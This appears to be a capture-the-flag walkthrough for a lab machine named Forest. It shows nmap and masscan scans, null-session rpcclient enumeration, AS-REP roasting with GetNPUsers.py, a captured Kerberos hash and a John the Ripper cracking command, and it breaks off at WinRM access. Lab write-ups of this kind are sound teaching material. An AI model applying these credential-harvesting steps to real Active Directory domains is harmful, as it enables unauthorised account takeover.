Let’s get started!

Level: medium

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -oN forest 10.10.10.161

Masscan

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.161 –rate=100

SMB Enumeration


Let’s see if we can enumerate list of users using rpcclient

COMMAND: rpcclient -U “” -N 10.10.10.161

AS-REP Roasting


AS-REP Roasting is an attack against Kerberos for user accounts that do not require
preauthentication. This is explained in pretty thorough detail in Harmj0y’s post
https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
Performing AS-REP Roasting with GetNPUsers

COMMAND: GetNPUsers.py htb/ -usersfile users -format john -dc-ip 10.10.10.161

Before doing it we need to save all the usernames in a file called users.

we got a hash value.let’s crack it.

e68279fd754fbb9fcf0869aaa4492ae1$edc5c3558d4531eefcae1023e9794037663d8f76a058734836e6f4712ee768b6042d2ea1adb0e8e09993c6e551381e0518cb2dd96b9cd35ec33fc82ca9cadb36697cb316bb734bf2a12cf0e95a96feb46929cd66cea7e2ec4beb0ac2ec20712211c88aee81175888748d36d752b1b9e2e193fc8c229a56e151ad1d54625c8ad22751ed42b93301e04216d60fee7ff9c7805fded5a0bc24b0de5808cbd55dc5401d17ad6cea09b1f7cc4a7d79f1229f8103c757788d5e630b6a448615b6df64aa794404f78bb20acb9ba2e105f6ed1ba1989a488ae6a48b61dce4ef00ea7cfc4e

Cracking the Hash

As you can see, we could grab the John the Ripper compatible hash and crack it with John.

COMMAND: john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Earlier during our enumeration, we noticed that port 5985 is open so we can use WinRM to
connect to the box. I used EvilWinRM and also, I used Get-DomainUser -UACFilter
DON’T_REQ_PREAUTH (PowerView.ps1)to verify which users do not need pre authentication

LEAVE A REPLY

Please enter your comment!
Please enter your name here